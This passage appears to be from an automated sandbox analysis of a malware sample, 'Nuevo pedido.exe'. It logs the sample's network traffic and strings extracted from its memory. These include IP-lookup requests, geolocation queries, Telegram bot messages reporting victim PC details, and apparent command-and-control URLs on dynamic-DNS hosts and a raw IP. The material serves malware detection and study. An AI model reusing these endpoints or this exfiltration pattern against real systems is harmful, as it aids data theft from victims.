                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49742 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 50.31.176.103
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:36:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:36:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Nuevo pedido.exe, 00000000.00000002.1730142640.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1776750263.0000000003119000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Nuevo pedido.exe, 00000000.00000002.1736143627.00000000058E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Nuevo pedido.exe, 00000000.00000002.1736270644.0000000005920000.00000004.00000020.00020000.00000000.sdmp, Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003151000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000032BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000032BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 